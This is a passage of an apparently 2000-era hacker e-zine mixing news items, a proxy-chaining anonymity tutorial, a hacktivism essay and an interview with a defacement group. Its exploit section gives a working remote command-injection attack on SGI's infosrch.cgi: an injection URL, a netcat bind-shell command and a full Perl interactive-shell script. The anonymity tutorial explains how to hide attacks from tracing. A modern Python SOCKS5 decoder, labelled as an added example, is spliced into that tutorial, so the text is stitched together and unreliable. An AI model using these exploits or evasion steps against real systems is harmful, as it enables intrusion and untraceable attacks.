- Passwords and exploits should not be traded/sold/whatever, everyone has to make his/her own exploits (except if you work in groups)
- At every breakpoint all exploits have to be sent in to receive the password
- The guest account is staying open for people who *don't* want to play, it should not be used by the gamers
- Backdoors that are easily cracked will be removed
- It would be nice if backdoors were erased after reaching a breakpoint, since they serve no use anymore (just a matter of keeping the box clean and the quota down)
- Don't bother the other gamers in any way (DoS, deleting files, also removing entries on the webboard)
- Keep everything tidy including the webpages

If you break these rules, you'll be instantly banned from the game (not kidding).

@HWA

295.0 [HWA] Out of the quagmire, something interesting emerges: b10z crew
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

fucking tests are in the .txt bro peep it out its all fuckin good! werd.

Submitted by Cruciphux/d0tslash

[14:39] http://b10z.hypermart.net/
[14:42] http://www.pots.gr/projects.html

irix cgi rape exploit
~~~~~~~~~~~~~~~~~~~~~

Feeling lucky?

1. Ok shit has changed. No more options. You can fill em in your damn self in the provided boxes.
2. You still must use either %20 or + for space.
3. By default this rapes SGI infosrch.cgi... read up at SecurityFocus if you don't know it, or put the gay ass phf hole in the cgi option field or some shit.
4. Like you can pick your own proxy too.
5. If the layout looks like shit ... guess what... I DON'T CARE!

At least glance at this.

binaries. Read the Advisory

Happy Hunting \\b10z\\ + d0tslash

This text is to explain the 0wnage. nothing more nothing less.

compile netcat with #define GAPING_SECURITY_HOLE
maybe edit Makefile and replace STATIC=-non_shared with STATIC=
upload precompiled nc binary via anonftp
If you have a user account you may use this also (what would be the point?).
place bin in /tmp
chmod 755 the bin.
exploit the infosrch.cgi hole to run the command:

    /tmp/nc -l -p 11111 -e /bin/sh -i
            ^     ^     ^
            |     |     `-- -e: execute this command when someone connects
            |     |         (added with the #define GAPING_SECURITY_HOLE recompile)
            |     `-- non-privileged port
            `-- listen for a connection

at this point you would telnet to the port to receive the output of the command... in the above example you receive a lame bindshell. type your command followed by ; voila, a bunk ass nobody shell, or if the admin was slippin, a r00t shell. believe it or not there are a few out there running as www or root. Please see README.httprape (10 + ./)

Advisory (SecurityFocus)

SGI InfoSearch fname Vulnerability
bugtraq id      1031
object          infosrch.cgi (exec)
class           Input Validation Error
cve             CVE-2000-0207
remote          Yes
local           Yes
published       March 05, 2000
updated         May 23, 2000
vulnerable      SGI InfoSearch 1.0
                  + SGI IRIX 6.5
                SGI IRIX 6.5.7, 6.5.6, 6.5.4, 6.5.3m, 6.5.3f, 6.5.3, 6.5.2m, 6.5.1, 6.5
not vulnerable  SGI IRIX 6.5.8, SGI IRIX 6.2

SGI InfoSearch fname Vulnerability

The InfoSearch package converts man pages and other documentation into HTML web content. The search form uses infosrch.cgi which does not properly parse user input in the 'fname' variable, allowing commands to be executed at the webserver privilege level by remote web users.

    http://target/cgi-bin/infosrch.cgi?cmd=getdoc&db=man&fname=|/bin/id

/data/vulnerabilities/exploits/infosh.pl

    #!/usr/bin/perl -w
    # infosearch.cgi interactive shell.
    # usage: ./infosh.pl hostname
    # 3/4/00
    # --rpc
    use IO::Socket;
    use CGI;                     # for CGI::escape()
    $|++;

    die "usage: $0 host\n" unless(@ARGV == 1);
    ($host) = shift @ARGV;

    # every command is appended after the pipe in the fname parameter
    $cgi = "/cgi-bin/infosrch.cgi?cmd=getdoc&db=man&fname=|";

    # url encode and send a command.
    sub send_cmd {
        my($url_command) = $cgi . CGI::escape(shift);
        $s = IO::Socket::INET->new(PeerAddr=>$host,PeerPort=>80,Proto=>"tcp");
        if(!$s) { die "denied.\n"; }
        print $s "GET $url_command HTTP/1.0\r\n";
        print $s "User-Agent: \r\n\r\n";
        @result = <$s>;
        # skip the HTTP headers (uninteresting data); give up if no blank line arrives
        shift @result while @result and $result[0] !~ /^\r\n/;
        shift @result if @result;
        $#result-- if @result;    # drop the trailing line of the page
        return @result;
    }

    # draw a pseudo prompt. i like "\h:\w \$ ".
    sub prompt {
        @res = send_cmd("/sbin/pwd");
        chomp($pwd = $res[0]);
        print "$host:", $pwd, "\$ ";
    }

    prompt;
    while(!eof(STDIN)) {
        chomp($cmd = <STDIN>);
        print send_cmd($cmd);
        prompt;
    }

From the SGI Advisory (attached in full in the 'Credit' section):

Although patches are available for this issue, it is realized that there may be situations where installing the patches immediately may not be possible. The steps below can be used to disable the infosrch.cgi(1) program to prevent exploitation of this vulnerability until patches can be installed.

1) Become the root user on the system.

    % /bin/su -
    Password:
    #

2) Change the permissions on the infosrch.cgi(1) program.

    =================
    **** WARNING ****
    =================

    Removing the permissions from the infosrch.cgi(1) program will prevent non-root users from using the Infosearch subsystem through the HTTP web server.

    # /bin/chmod 500 /usr/lib/infosearch/bin/infosrch.cgi

3) Return to previous level.

    # exit
    %

---

For another workaround, see "Re: Vulnerability in infosrch.cgi" in Credit.

SGI IRIX 6.5.6, 6.5.4 and 6.5.3m: SGI upgrade Maintenance Releases
  http://support.sgi.com/colls/patches/tools/relstream/index.html
  Upgrade to the latest Maintenance Release of IRIX 6.5.x here.
SGI IRIX 6.5.3f, 6.5.3, 6.5.2m, 6.5.1 and 6.5: SGI upgrade Maintenance Releases
  http://support.sgi.com/colls/patches/tools/relstream/index.html
  Upgrade to the latest Maintenance Release of IRIX 6.5.x here.

credit     Posted to Bugtraq on March 5, 2000 by rpc.
reference  advisory: 20000501-01-P: Vulnerability in infosrch.cgi (SGI)
           message: infosrch.cgi vulnerability (IRIX 6.5) (rpc)
           message: Re: Vulnerability in infosrch.cgi (Jose Nazario)

296.0 [MM] Cnet: AltaVista credits players $1 after contest error
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

http://news.cnet.com/news/0-1007-202-2236499.html

AltaVista credits players $1 after contest error
By Greg Sandoval
Staff Writer, CNET News.com
July 10, 2000, 4:30 p.m. PT
URL: http://news.cnet.com/news/0-1007-200-2236499.html

Thousands of people who were told erroneously that they had won $500 worth of shopping credit on AltaVista last week are only going to get credit worth a single dollar, the company said.

"Our situation is very much like when a bank mistakenly deposits money into your account. It's not yours to keep. I think people understand that," AltaVista spokesman David Emanuel said.
AltaVista is giving 1000 points, which equals a dollar's worth of credit, to anyone who participated in the company's Rewards Program contest between July 2 and July 4. It was during that period that some visitors discovered that the Web portal's computer system would bring up a "winner notice" if the contest page was refreshed several times, AltaVista said.

But dozens of enraged contest participants on almost a half dozen message boards say they disagree with the company's version of what happened. They say they received notices without ever hitting the refresh key.

"I have no sympathy for the people who forced it to display a winner page," said player Jay Battmer in an email to CNET News.com. "But it was pretty rough on those who played the game honestly and won nothing."

Many players called for AltaVista to honor all the winning notices, saying the company made the error and should stand by the word of its notices, erroneous or not.

Emanuel said there were 20 legitimate winners each day during that period who have received their $500 credit. The others, regardless of whether the person won by tinkering with the system, were incorrectly notified and are not entitled to share in the winnings.

In accordance with the rules of the Instant Win game a member is eligible to play the game once per day by clicking the link to the game page one time only, according to a copy of a letter AltaVista sent to players.

AltaVista has apologized for the error and said it hopes the 1000 points will be a step toward comforting those who thought they had won the $500 in credit.

"We have over 300,000 valued customers in our rewards program," Emanuel said. "We have corrected the mistake. When we've explained what happened, that it was a mistake, people seem to understand."
@HWA 297.0 [HWA] Securax "socksploitation" tutorial ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +----------------------+----------------------------------------------------+ | SECURAX TUTORIAL | ANONYMOUS CONNECTIONS OVER THE NET: | | | Socks Chains in Windows | +----------------------+----------------------------------------------------+ | written by Zoa_Chien | HTML version with screenshots available at | | design by nostalg1c | http://www.securax.org/ZC/anon/ | +----------------------+----------------------------------------------------+ http://www.socks.nec.com/50001224/sc32b206.exe __/ introduction \___________________________________________________________ this tutorial is an attempt to help you re-route all internet winsock applications in ms windows trough a socks chain, thus making your connections much more anonymous. __/ theory \_________________________________________________________________ the more different hops you make your data jump, the more difficult it will be to trace it back. take this route for example: you --> socks1 --> socks2 --> socks3 --> ... --> socksx --> target people who want to trace you will have to contact x persons to ask their them for their logs. chances are one of them didn't log... and if they logged, the ip seen by each host/socks is the ip of the previous host/socks in the chain. this works for: . icq-like tools . ftp clients . mail clients . telnet clients . portscanners . (just about anything that uses the internet) it doesn't work on most irc servers since they often check for open wingates and proxies. __/ now let's do it \________________________________________________________ - first you need to find some boxes running wingate we look for wingates since the default installation of wingate includes a non-logging socks server on port 1080 visit http://proxys4all.cgi.net/win-tel-socks.shtml or http://www.cyberarmy.com/lists/wingate/ for some wide-known wingate ips, or even better: you could try to find some yourself. 
to do this, i would suggest you use 'proxy hunter', available for download at http://www.securax.org/ZC/anon/proxyht300beta5.exe be sure to look for wingates (port 23) and not for socks, as we only want wingate socks. you could also use wingatescan, available for download at http://www.securax.org/ZC/anon/wgatescan-22.zip speed is very important since we will be using multiple socks, and we don't want our programs to time out. with the klever dipstick tool, you can find out which are the fastest ones. (get the klever dipstick program at http://klever.net/kin/static/dipstick.exe) Just fire off Dipstick. Rightclick in the small green rectangular and choose Show main window. To import a list of wingates, just click on Advanced, choose Import List and select your file. You can also manually ping a simple host by clicking on Manual Ping. Use those wingates with the smallest average time. *duh* - second, check if the wingates from the list are actually running :) there are a lot of programs that can help you with this, one of them is server 2000, available for download at http://freespace.virgin.net/david.wood6/Server/Server.htm - third, install a program that will intercept all outgoing networking calls. i use the great tool sockscap for this purpose. you can get it at http://www.socks.nec.com/sockscap.html in the setting, enter this as socks server : 127.0.0.1 port 8000. click on 'socks version 5'. click 'resolve all names remotely'. uncheck 'supported authentication'. in the main window, choose new and then browse to create a shortcut for the internet client you want to give socks support. repeat this step for every program you want. - install socks chainer download it at http://www.ufasoft.com/socks in the service menu, click on new. enter 'Chain' as name and '8000' as port to accept connections on. 
  click on new and fill in the ips of the fastest wingates you found, but this
  time, use port 1080 (and not port 23). using the '<' and '>' buttons, you
  can add and remove socks. be sure to test all socks one by one before adding
  them all to the list at once, because if one of them is bad, your chain will
  not work and you will not be able to locate the bad socks in the chain. if
  all of them seem to work, you use the '<' key to add them all (mind speed
  problems. 4 or less is fine. i think 10 or 13 is the limit put by tcp/ip)

__/ testing your anonymous setup \___________________________________________

to check what socks your computer is connecting to, you can use x-ploiters
totostat (http://idirect.tucows.com/files/totostat_install.exe). look for
connections to port 1080; the remote ip found there should be the first ip
found in your chain in sockschain.

use the shortcut in sockscap that points to your browser, and connect to
http://cavency.virtualave.net/cgi-bin/env.cgi or
http://internet.junkbuster.com/cgi-bin/show-http-headers

use your shortcut in sockscap to start your telnet client, then telnet to
ukanaix.cc.ukans.edu

you can also use https://sites.inka.de:8001/cgi-bin/pyca/browser-check.py
to test ssl, or ftp.zedz.net to verify your ip via ftp.

in all the above cases, the remote server should show you the ip of the last
server in the sockschain. if you look at the sockschain program while surfing
you should see the chain being built up.

__/ some final remarks \____________________________________________________

never use internet explorer to do tricky stuff as it might reveal your ip.
my personal favorite browser is opera 4.0 (http://www.opera.com/)

if you looked carefully at what is displayed when you go to the
http://internet.junkbuster.com/cgi-bin/show-http-headers page, you might have
noticed that a lot of stuff about our client is being sent.
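The testing step above has you watch for connections to port 1080 and check which ip the far end sees. As an added example (not part of the Securax tutorial or of any tool it names), the decoder below reads a captured SOCKS5 handshake (RFC 1928) from the defender's side of the same traffic: it reports whether the server accepted the client with no authentication at all (an open proxy, which is what the default WinGate socks service above is) and whether the CONNECT asked the proxy to go on to another host's port 1080, which is how one hop of the chain described above looks on the wire. The byte strings, the hypothetical 198.51.100.7 next hop and the www.example.org destination are constructed for this example.

```python
"""Decode captured SOCKS5 handshakes (RFC 1928) as a defender reading port-1080
traffic would: did the server admit the client without authentication, and is
the CONNECT destination another host's port 1080 (one hop of a socks chain)?"""
from dataclasses import dataclass
from typing import List, Optional
import ipaddress
import struct

SOCKS5 = 0x05
NO_AUTH = 0x00
CMD_NAMES = {0x01: "CONNECT", 0x02: "BIND", 0x03: "UDP_ASSOCIATE"}
SOCKS_PORT = 1080  # port the chain hops in the tutorial listen on


@dataclass
class Handshake:
    methods_offered: List[int]
    method_selected: int
    command: Optional[str]       # None when no request followed the greeting
    dest_host: Optional[str]
    dest_port: Optional[int]
    reply_code: Optional[int]    # 0x00 = succeeded (RFC 1928 section 6)

    @property
    def open_proxy(self) -> bool:
        """Server accepted the client without any authentication."""
        return self.method_selected == NO_AUTH

    @property
    def chain_hop(self) -> bool:
        """Server was asked to connect onward to another SOCKS port."""
        return self.command == "CONNECT" and self.dest_port == SOCKS_PORT

    def findings(self) -> List[str]:
        tags = []
        if self.open_proxy:
            tags.append("open-proxy")
        if self.chain_hop:
            tags.append("chain-hop")
        return tags


def _read_addr(buf: bytes, off: int):
    """Parse ATYP + DST.ADDR + DST.PORT starting at off; return (host, port, next)."""
    atyp = buf[off]
    off += 1
    if atyp == 0x01:                                   # IPv4: 4 octets
        host, off = str(ipaddress.IPv4Address(buf[off:off + 4])), off + 4
    elif atyp == 0x03:                                 # domain: length-prefixed
        n = buf[off]
        host, off = buf[off + 1:off + 1 + n].decode("ascii"), off + 1 + n
    elif atyp == 0x04:                                 # IPv6: 16 octets
        host, off = str(ipaddress.IPv6Address(buf[off:off + 16])), off + 16
    else:
        raise ValueError(f"unknown ATYP 0x{atyp:02x}")
    (port,) = struct.unpack("!H", buf[off:off + 2])   # network byte order
    return host, port, off + 2


def decode_handshake(client: bytes, server: bytes) -> Handshake:
    """Decode one session from its client->server and server->client bytes."""
    if len(client) < 2 or client[0] != SOCKS5 or len(server) < 2 or server[0] != SOCKS5:
        raise ValueError("not a SOCKS5 exchange")
    nmethods = client[1]
    methods = list(client[2:2 + nmethods])             # greeting: VER NMETHODS METHODS
    selected = server[1]                               # selection: VER METHOD
    if selected != NO_AUTH:
        # Username/password (0x02) or GSSAPI (0x01) sub-negotiation, or a 0xFF
        # rejection, would follow here; this decoder stops at the method choice.
        return Handshake(methods, selected, None, None, None, None)
    req = client[2 + nmethods:]                        # request: VER CMD RSV ATYP ...
    if len(req) < 4 or req[0] != SOCKS5 or req[2] != 0x00:
        raise ValueError("malformed SOCKS5 request")
    command = CMD_NAMES.get(req[1], f"cmd-0x{req[1]:02x}")
    host, port, _ = _read_addr(req, 3)
    rep = server[2:]                                   # reply: VER REP RSV ATYP ...
    reply_code = rep[1] if len(rep) >= 2 else None
    return Handshake(methods, selected, command, host, port, reply_code)


# Constructed capture: client offers no-auth and user/pass, server picks no-auth,
# client asks for CONNECT to 198.51.100.7:1080 (the next hop of a chain), server
# replies "succeeded" bound to 0.0.0.0:0.
CLIENT_CHAIN = bytes([0x05, 0x02, 0x00, 0x02,
                      0x05, 0x01, 0x00, 0x01, 198, 51, 100, 7, 0x04, 0x38])
SERVER_OPEN = bytes([0x05, 0x00,
                     0x05, 0x00, 0x00, 0x01, 0, 0, 0, 0, 0x00, 0x00])
# Constructed capture: same open server, ordinary CONNECT to www.example.org:80.
CLIENT_WEB = (bytes([0x05, 0x01, 0x00, 0x05, 0x01, 0x00, 0x03, 15])
              + b"www.example.org" + bytes([0x00, 0x50]))
# Constructed capture: a server that insists on username/password (0x02).
SERVER_AUTH = bytes([0x05, 0x02])

if __name__ == "__main__":
    for c, s in ((CLIENT_CHAIN, SERVER_OPEN), (CLIENT_WEB, SERVER_OPEN),
                 (CLIENT_CHAIN, SERVER_AUTH)):
        hs = decode_handshake(c, s)
        print(hs.dest_host, hs.dest_port, hs.findings())
```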
to avoid this leakage of client headers, we could install another proxy
between sockscap and the sockschainer proxy that would filter out those
things. A4proxy is an example of a proxy capable of doing such things.

remember, if you want to do the real stuff, better switch to linux.

Zoa_chien, 22/5/error
#securax on EFNET

298.0 [IND] Hacktivism: Hacktivismo with cDc
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

http://cultdeadcow.com/hacktivismo.html

We are HACKERS and we are HACKTIVISTS. Our mandate is to keep the Internet
free, healthy, and adventurous. We will not be bullied. HACKTIVISTS are not
the ones who decided to shackle free speech and the open exchange of ideas.
We believe in the 19th Article of the United Nations Declaration on Human
Rights. We believe in the dignity of all human beings. And we believe in loud
music and big parties. Start reading. Start thinking. Start acting.

***

Below is a response to the Electrohippies rationale for supporting DDoS
attacks. Please take the time to visit their site and make up your own mind.

Key concepts: Electrohippies, anticorporatism, packet wankers, Denial of
Service (DoS), Freedom of Expression, hacktivism versus [h]activism.

One Liner: The Electrohippies are trying to rationalize Denial of Service
attacks and violate the First Amendment privileges of their opponents.

Links:
http://www.gn.apc.org/pmhp/ehippies/ Electrohippies Web site
http://www.gn.apc.org/pmhp/ehippies/files/op1.htm Occasional paper no.1
Client-side Distributed Denial-of-Service: valid campaign tactic or terrorist
act?

The Electrohippies have published an occasional paper (EOP) that asks whether
their recently published DoS application is a valid campaign tactic or a
terrorist act. After introducing a quote from the New Testament that
transmogrifies Jesus Christ into a packet wanker scourging the Internet of
E-commerce, the question is then answered with an argument that crucifies
all common sense. This essay will address several errors from the EOP that
require correction.
[All quotes taken from the EOP and appear sequentially]

"As Jesus ransacked the temple in Jerusalem because it had become a house of
merchandise, so the recent [DDoS] attacks on e-commerce web sites are a
protest against the manner of it’s [sic] recent development".

This is the first and most egregious error that the Electrohippies make. It
betrays their lack of understanding of hacker culture; it also creates a
false bridge to their own anticorporate bias. As no statement of claim was
made by the DDoS perpetrators, left-leaners, Adbuster sympathizers and
wishful thinkers projected their own raison d’etre onto the event to
construct an illusory foundation for their personal projects. In fact the
DDoS attacks of early February were nothing more than packet wanking at its
finest, or as hackers would say, going for the full woody. It was irrelevant
that the targeted sites were commercial and had e-commerce components. They
could just as easily have been the Vatican, a Britney Spears fan site, or
Aunt Beulah’s Jam page, that is, if those sites represented the same level
of prestige and notoriety as the actual targets. There’s a lot of juice in
the packet wanking world associated with taking down a large site. It has
nothing to do with e-commerce no matter what the Electrohippies, The Village
Voice or other projectionists wish were the case.

"Whatever the views of particular people about the development of e-commerce
on the ‘Net [sic], we must not ignore the fact that as another part of
society’s public space the Internet will be used by groups and individuals
as a means of protest. There is no practical difference between cyberspace
and the street in terms of how people use the ‘Net [sic]".

E-commerce is a technology. It is used across the board by not-for-profit
groups, independent record companies, and transnational corporations. It is
this last group, one assumes, that the Electrohippies take issue with.
But there is no effective difference between this method of exchange and the
use of cash or credit off-line. By attacking e-commerce the Electrohippies
create the impression that they are Luddites when what they mean to say is
that they are anticorporate. Like many people, the Electrohippies have been
confused by technology. They are trying to filter their agenda through the
Internet rather than focussing on first principles.

The Electrohippies further compound their misunderstanding of the Internet by
assuming that the same rules hold in the digital realm as they do down on the
street. They do not. Where a large physical mass is the currency of protest
on the street, or at the ballot box, it is an irrelevancy on the Internet.
Or more correctly, it is not always necessary. Of course many people can make
a difference on the Internet if one is talking about site traffic. High
visitation boosts domain value; conversely its absence will decrease it. But
to think that it takes a lot of people to execute an act of civil
disobedience on the Internet is naive. Programs make a difference, not
people. And as a last thought, I know from personal experience that there is
a difference between street and on-line protest. I have been chased down the
street by a baton-wielding police officer on horseback. Believe me, it takes
a lot less courage to sit in front of a computer.

"…the difference between the two actions [DDoS packet wanking and the WTO
on-line protests in which the Electrohippies participated] is the one of
popular legitimacy versus individual will. The structure of the client-side
distributed actions developed by the electrohippies means that there must be
widespread support across a country, or continent in order to make the
system work. Our method has built within it the guarantee of democratic
accountability".

The Electrohippies are laboring under several false assumptions here.
They believe that there is some nexus between their on-line actions against
the WTO and the DDoS attacks against Yahoo, et al – there is not. And they
think that somehow if many people perpetrate a DoS attack as opposed to just
one, then that is, ethically speaking, a better thing. Bollocks. Denial of
Service, is Denial of Service, is Denial of Service, period. The only
difference between a program like Stacheldraht [a DDoS application written
by The Mixter] and the client side javascript program written by the
Electrohippies is the difference between blowing something up and being
pecked to death by a duck. And if numbers lend legitimacy - as the
Electrohippies propose - then the lone bomber who tried to assassinate
Hitler in his bunker was wrong and the millions who supported the dictator
were right.

If the Electrohippies wish to take actions that involve large groups then
they should leverage their supporters against their targets in more
practical ways. For instance, let’s say the Electrohippies take exception to
the business practice of a large transnational that exploits child labour in
developing countries. And let's say that this same transnational has an
e-commerce enabled Web site selling its merchandise. So if the Electrohippies
were to organize fifty thousand people to make a purchase from said Web site,
then return the item with a letter of protest and a demand for a refund, then
they might lodge a protest with the transnational that it would seek to
remedy. This particular suggestion would have to be tweaked according to the
target but it makes the point. Creating an intolerable snag in running a
business is a far more productive use of protest action than disabling a Web
server for a short time, the ethics of such notwithstanding.

"the electrohippies collective believe that the acts or views perpetrated by
the targets of a DoS action must be reprehensible to many in society at
large, and not just to a small group.
It is on this basis that the collective undertook the action against the WTO
during their conference in Seattle, and it is also the basis upon which we
are planning future actions".

Denial of Service attacks are a violation of the First Amendment, and of the
freedoms of expression and assembly. No rationale, even in the service of
the highest ideals, makes them anything other than what they are -- illegal,
unethical, and uncivil. One does not make a better point in a public forum
by shouting down one’s opponent. Say something more intelligent or observe
your opponents' technology and leverage your assets against them in creative
and legal ways. Hacktivism is about using more eloquent arguments – whether
of code or words – to construct a more perfect system. One does not become a
hacktivist merely by inserting an "h" in front of the word activist or by
looking backward to paradigms associated with industrial organization. One
does so by living in the present and recognizing reality.

We live in a post-Newtonian universe although too many people are unaware of
this. There is still talk of left and right, of a centre to the margins
sensibility. This world was blown apart by Einstein. The universe is no
longer explosive, it is implosive. And to take part in social and political
discussions one must move inward to the centre rather than outward to the
extremes. Being a centrist is the new reality; everything else is
reactionary.

While the Electrohippies cannot be faulted for their dedication and good
intentions, we all know how the road to hell is paved. And if they are as
dedicated to the Scriptures as they appear to be, then let them ponder this.

The fear of the LORD is the beginning of knowledge: but fools despise wisdom
and instruction. -- Proverbs, I v7.

I don’t think that the Electrohippies are fools.

-- oxblood ruffin!cDc foreign minister

"cDc.
We put the hack into hacktivism"

@HWA

299.0 [IND] Hacktivism: GForce using website defacements to spread their word
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

You have seen the high profile sites on Attrition that have been defaced by
GForce. SugarKing from HWA Staff interviews GForce members for a closer look
into why they do it.

(c)2000 SugarKing/HWA.hax0r.news
if reprinted please include the source http://welcome.to/HWA.hax0r.news

[20:59] SugarKing: So we can start the interview ;)
[20:59] sure
[20:59] alright, is this everyone you want present?
[21:00] yes, most of the other guys aren't on, some are busy, and it's very early here.
[21:00] yeah
[21:01] ok, you don't have to answer any question if you don't want to...
[21:01] ok
[21:02] so lets begin:)
[21:02] yep
[21:02] ok first off, how many members are there, and who are they?
[21:03] *** sniper- is now known as sniper__
[21:03] ehehe
[21:03] heh
[21:03] services sux
[21:03] There are about 5 members, they are myself, miller, rave-, heataz, and instinct atm
[21:03] ok
[21:04] when was the group founded and by who?
[21:04] It was founded about a year ago, by myself, heataz and miller
[21:05] what was your sole purpose of starting the group? for the reasons you name in your defacements?
[21:06] GForce was born out of hate and contempt for violence, atrocities and human rights violations against Muslims, specially the affectees in Kashmir
[21:06] It was precipitated to bring the attention of world leaders and organizations to the issue in cyberspace which is today the leading source of communication. The motive behind the formation of the group was to create global awareness about kashmir.
[21:06] which members are actually from Pakistan?
[21:07] if any
[21:07] we focus on kashmir, basically.
[21:07] so nobody is actually from kashmir?
[21:07] well i`m from pakistan, others would like to stay anonymous please.
[21:08] well no one is from kashmir.
[21:08] sure, np
[21:08] =)
[21:08] some of your defacements are gov servers, any reason for targeting gov's? are you afraid to get busted?
[21:09] Not really, We are not afraid to get busted for the reason that it's a good cause, secondly members are out of the feds reach ;)
[21:10] yeah of course
[21:11] you are one of, if not the only, people on attrition that I've seen that actually have a REASON
[21:11] instead of just "I 0wn j00"
[21:11] :)
[21:11] *** snipah- (**************) has joined #gforce
[21:11] sorry i got disconnected.
[21:11] US government was targeted because 1) more people view .gov's and we can do a good job in achieving the goal we are out for. 2) We're a big angry :)
[21:12] big=bit
[21:12] *** sp1n sets mode: +o snipah-
[21:12] and it seems like you guys got some skill, seeing you don't really do any NT hacks
[21:12] *** rpcb1nd (***************) has joined #gforce
[21:12] *** sk0l (*****************) has joined #gforce
[21:12] *** sp1n sets mode: +o rpcb1nd
[21:12] *** sp1n sets mode: +o sk0l
[21:13] i`m glad we don't do NT,
[21:13] we are supported by a study group known as hexa labs
[21:13] what is hexa labs
[21:13] ?
[21:13] Plus every member can code (usefully)
[21:14] hexa labs is a study group, they find out vulnerabilities, code them (we help code)
[21:14] most of it is being kept private.
[21:14] *** sniper__ has quit IRC (Ping timeout)
[21:14] you guys ever use your own exploits when using them on defacing?
[21:15] *** sk0l sets mode: +l 14
[21:16] [rave-:#gforce PING]
[21:16] ehhe
[21:16] alot of times we use own exploitz
[21:16] heh
[21:17] sometimes we use a wuftp (b0f rulz) and bind.. but no details
[21:17] yeah b0f rules
[21:17] :)
[21:17] :)
[21:17] what do you guys think about ./hack kiddies on attrition like the Crime Boys?
[21:18] *** snipah- has quit IRC (Ping timeout)
[21:18] oh
[21:18] we dont appreciate it, we think about just kids who dont know what to do.
[21:19] who thinks about computer hacking/security is just get proggies from others dudes and exploit of Dos something
[21:19] we think about computer security is a big culture and need to dedicate to it, studies, tests, and fucking blowing head
[21:19] eheh
[21:20] crimeboys is very poor
[21:20] NT hackers
[21:20] yeah I agree
[21:20] are most of you guys teenagers?
[21:21] i dunno about sniper but i have 20 yrs old
[21:22] *** sniper__ (***************) has joined #gforce
[21:22] wb
[21:22] *** rave- sets mode: +o sniper__
[21:22] thx
[21:22] so why do you think India is solely responsible for this ordeal in Kashmir?
[21:24] *** rpcb1nd sets mode: +l 13
[21:24] because they are, 1) they are pretty lame as they don't wana listen to any one, the people want freedom but India won't let them. to add to all this they rape innocent women, small children get murdered, made orphans. and they violate human rights
[21:25] *** sp1n sets mode: +l 14
[21:26] nod
[21:26] pretty violent
[21:27] yep.
[21:27] you guys plan on keep defacing and protesting till someone gets busted?
[21:28] not sure, but yes we will be defacing for some while. ;)
[21:28] what do you plan on accomplishing by defacing on this issue?
[21:29] to get people to realize the situation ?
[21:29] yep, create global awareness, on many occasions people have asked us if kashmir is some one like kevin mitnick =)
[21:30] obviously they 'kashmir' is some guy
[21:30] hahah
[21:31] they thought even.
[21:31] any last comments/shout outs?:)
[21:32] =]
[21:33] yes
[21:34] shoot:)
[21:35] I`d like to thank mos (muslim online syndicates) for what ever they have done, Pakistan Hackers club, hexa labs for coding, attrition, munge, punkis, null, mcintyres, jerisho for fast mirroring, zillion@safemode , rr, cen, and all in @linuxsex
[21:35] oh and #darknet@efnet ;)
[21:36] last shouts to hwa security ;)
[21:37] hah nice, thanks for the interview:)
[21:37] ah, np
[21:39] [rave-:#gforce PING]

@HWA

300.0 [HNS] Help Net Security News Letter #20
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

http://net-security.org/

Net-Sec newsletter
Issue 20 - 03.07.2000
http://net-security.org

Net-Sec is a newsletter delivered to you by Help Net Security. It covers
weekly roundups of security events that were in the news the past week.
Visit Help Net Security for the latest security news -
http://www.net-security.org.

Subscribe to this weekly digest on:
http://www.net-security.org/text/newsletter

Table of contents:

1) General security news
2) Security issues
3) Security world
4) Defaced archives

General security news
---------------------

----------------------------------------------------------------------------

SECURITY CHECKS CRASH ROUTERS
Red-faced networking giant Cisco has been forced to warn customers that its
routers can crash when tested for security vulnerabilities by security
scanning software programs.
Link: http://www.vnunet.com/News/1104718

SECURE MESSAGING
Critical Path detailed a suite of secure messaging services designed to help
enterprises protect information assets such as engineering drawings,
financial documents, and legal agreements transferred over the Internet.
Link: http://www.infoworld.com/articles/hn/xml/00/06/26/000626hncritical.xml

UK BACKS AWAY FROM RIP BILL
CNN reports that the U.K.
government is backing away from some of the more controversial aspects of
its e-mail surveillance bill (Regulation of Investigatory Powers - RIP)
currently under consideration in the House of Lords.
Link: http://www.cnn.com/2000/TECH/computing/06/26/cybersnoop.idg/index.html

CRACKED! PART 6: TALKING WITH THE ENEMY
"Soon after rebuilding the system I started talking to someone on IRC that
identified themselves as the person that had cracked our system. He was
connecting from the same places that the cracker had been coming from and
seemed to know things that only the cracker would have known, so I decided
to take him at face value. Over the first couple of weeks we talked about a
variety of subjects. I have selected some of the most interesting bits and
grouped them together to give an idea of the flavor of the conversations. It
was an interesting window into the mind of someone living a very different
life."
Link: http://www.rootprompt.org/article.php3?article=588

SCENES FROM THE "HACKERS" HOOD
"The impression that most people fail to get from regular attacks is how
trivial they are," said Elias Levy, chief technology officer of
SecurityFocus.com. "These people tend to choose their targets pretty much at
random - or whoever bothers them that day, or pisses them off."
Link: http://www.wired.com/news/culture/0,1284,37238,00.html

VIRUS SCAN FOR HANDHELDS
It looks like McAfee is now offering virus scanning software for handheld
computers. Although there are no viruses for handhelds, there is a chance of
infection when you sync your handheld and your PC. Contributed by Brian.
Link: http://www.mcafee.com/wireless/handscan/default.asp?

MATTEL AND PRIVACY
In response to public complaints about privacy, Mattel Interactive announced
that the company would provide a tool that removes software that was
surreptitiously placed on customers' computers and is designed to transmit
and receive information to Mattel.
Link: http://abcnews.go.com/sections/business/DailyNews/mattel000624.html

BANK DETAILS SNATCHED
A man calling himself 'Kelly' rang ABC radio station 2BL claiming he had
accessed company details from the GST information site www.gstassist.gov.au,
which contains the details of about 27,000 businesses. According to ZDnet
AU, he said that he simply inserted numbers between 1 and 27,000 into a CGI
request and it retrieved the records. Contributed by Apocalyse Dow.
Link: http://www.zdnet.com.au/zdnn/stories/zdnn_display/au0003700.html

NIKE HIJACKING, PART II
The Nike.com hijacking received a sequel - when Nike's website was hijacked
last week, traffic was redirected through one man's Web servers in the U.K.,
bogging them down and costing his Web hosting company time and money (at
least he says so). Now he is suing Nike and has created a "Shame on Nike"
web site.
Link: http://www.wired.com/news/politics/0,1283,37286,00.html
Link: http://www.shameonnike.com/

